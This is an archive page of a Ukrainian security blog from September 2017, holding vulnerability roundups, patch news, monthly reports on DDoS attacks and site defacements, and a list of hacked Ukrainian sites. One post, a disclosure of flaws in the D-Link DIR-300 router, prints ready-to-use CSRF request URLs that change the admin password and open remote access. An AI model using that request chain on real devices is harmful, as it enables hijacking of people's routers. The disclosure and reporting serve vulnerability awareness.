Архів за Вересень, 2017

Уразливості в плагінах для WordPress №266

23:58 30.09.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах No External Links, Commentator, Extredj, Appointment Booking Calendar, Easy Gallery. Для котрих з’явилися експлоіти.

  • WordPress No External Links 2.6.3 / 2.7.1 Open Redirect (деталі)
  • WordPress Commentator 2.5.2 Cross Site Scripting (деталі)
  • WordPress Extredj Open Redirection (деталі)
  • WordPress Appointment Booking Calendar 1.1.23 SQL Injection (деталі)
  • WordPress Easy Gallery 4.1.4 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Вийшли PHP 7.0.24 і 7.1.10

22:42 30.09.2017

У вересні 28.09.2017 і 29.09.2017, вийшли PHP 7.0.24 і PHP 7.1.10. У версії 7.0.24 виправлено багато багів і уразливостей, у версії 7.1.10 виправлено багато багів і уразливостей.

Дані релізи направлені на покращення безпеки і стабільності гілок 7.0.x і 7.1.x.

У PHP 7.0.24 і 7.1.10 виправлено:

  • Пошкодження пам’яті.
  • Численні вибивання в різних функціях (DoS).
  • Уразливості в ядрі та модулях.

По матеріалам http://www.php.net.

Уразливості в Microsoft Exchange

20:04 30.09.2017

Виявлені уразливості в Microsoft Exchange. Що були виправлені у вівторку патчів у вересні.

Уразливі продукти: Microsoft Exchange Server 2013 і 2013 SP1, Exchange Server 2016.

Виконання коду в Outlook Web Access (OWA).

CSRF уразливості в D-Link DIR-300

16:28 30.09.2017

17.03.2016

У січні, 29.01.2015, я виявив Cross-Site Request Forgery уразливості в D-Link DIR-300. Це Wireless Router і AP.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DIR-300 та D-Link DGS-3200-16.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

30.09.2017

Після попередніх AoF, BF та CSRF уразливостей, тримайте нові Cross-Site Request Forgery дірки. Для захоплення контролю над пристроєм потрібно зробити декілька CSRF запитів: змінити пароль, логін при цьому фіксований (це раніше згадана AoF уразливість), увімкнути віддалений доступ та зберегти налаштування.

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

Додати налаштування для увімкнення віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1

Зміна налаштування для увімкнення віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1

Видалення налаштування віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1

Збереження всіх змінених налаштувань пристрою:

http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y

Уразлива версія D-Link DIR-300NRUB5, Firmware 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка експлоітів

23:57 29.09.2017

В даній добірці експлоіти в веб додатках:

  • ZKTeco ZKBioSecurity 3.0 - Directory Traversal (деталі)
  • ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin) (деталі)
  • Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery) (деталі)
  • Freefloat FTP Server 1.0 - ‘RMD’ Command Buffer Overflow (деталі)
  • KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH) (деталі)

Вересневі DDoS атаки та взломи

22:45 29.09.2017

Раніше я писав про серпневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію вересні.

В зв’язку з сепаратистськими і терористичними акціями на сході України, хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Іноземні хакери провели неполітичні взломи державних сайтів:

rajvosevlush.gov.ua (хакером Prosox) - 10.09.2017
pereyaslav-rda.gov.ua (хакером Tobitow) - 18.09.2017
www.pechenigi-rda.gov.ua (хакером Mister Spy) - 22.09.2017

Проукраїнськими хакерами були атаковані наступні сайти:

Вересневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі місяця.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт livestarobelsk.org (через вплив на хостера) - 09.2017
Закритий сайт livestarobelsk.ru (через вплив на хостера) - 09.2017
Закритий сайт newsnews.tv (через вплив на хостера) - 09.2017
Закритий сайт rusobschina.com (через скаргу хостеру) - 09.2017
Закритий сайт obkon.ucoz.com (через скаргу хостеру) - 09.2017
Закритий сайт pomogibratu.ru (через скаргу хостеру) - 09.2017

Добірка уразливостей

19:31 29.09.2017

В даній добірці уразливості в веб додатках:

  • HP System Management Homepage (SMH) on Linux and Windows, Multiple Vulnerabilities (деталі)
  • SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities (деталі)
  • Kibana vulnerability (деталі)
  • Arbitrary File Disclosure and Open Redirect in Bonita BPM (деталі)
  • HP Sprinter, Remote Execution of Code (деталі)

Численні уразливості в Microsoft Office Web Apps

17:24 29.09.2017

Виявлені численні уразливості безпеки в Microsoft Office, а також в серверних продуктах Office Web Apps і SharePoint Server. Що були виправлені у вівторку патчів у вересні.

Уразливі продукти: Microsoft Office Web Apps 2010 SP2, Office Web Apps 2013 SP1, Office Online Server 2016, Excel Web App 2013 SP1, SharePoint Server 2007 SP3, SharePoint Server 2010 SP2, SharePoint Server 2013 SP1, SharePoint Foundation 2013 SP1, SharePoint Enterprise Server 2016, Lync 2010, Lync Basic 2013 SP1, Lync 2013 SP1, Skype for Business 2016 Basic, Skype for Business 2016.

Обхід безпеки, пошкодження пам’яті, виконання коду.

Похакані сайти №344

23:59 28.09.2017

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://ifstat.gov.ua (хакером Anonymous Arabe) - 03.01.2017 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://pfu-sumy.gov.ua (хакером Anonymous Arabe) - 03.01.2017 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://kmu.man.gov.ua (хакером Ayyildiz Tim-maress) - 09.07.2017 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://archives.man.gov.ua (хакером Ayyildiz Tim-maress) - 09.07.2017 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://dec.man.gov.ua (хакером Ayyildiz Tim-maress) - 09.07.2017 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://president.man.gov.ua (хакером Ayyildiz Tim-maress) - 09.07.2017 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://decentralization.man.gov.ua (хакером Ayyildiz Tim-maress) - 09.07.2017 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://afonia.kiev.ua (хакером ALP3R) - 05.01.2017, зараз сайт вже виправлений адмінами
  • http://jobhunter.com.ua (хакером PURPPOSOLES)
  • http://volyninfo.com (хакером Shade) - 03.03.2017, повідомлення хакера все ще розміщено на сайті

Уразливості в Microsoft .NET Framework

22:43 28.09.2017

Виявлені уразливості в Microsoft .NET Framework та Microsoft Windows. Що були виправлені у вівторку патчів у вересні.

Уразливі продукти: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 3.5.2, 4.6, 4.6.1, 4.6.2, 4.7.

Виконання коду через пошкодження пам’яті.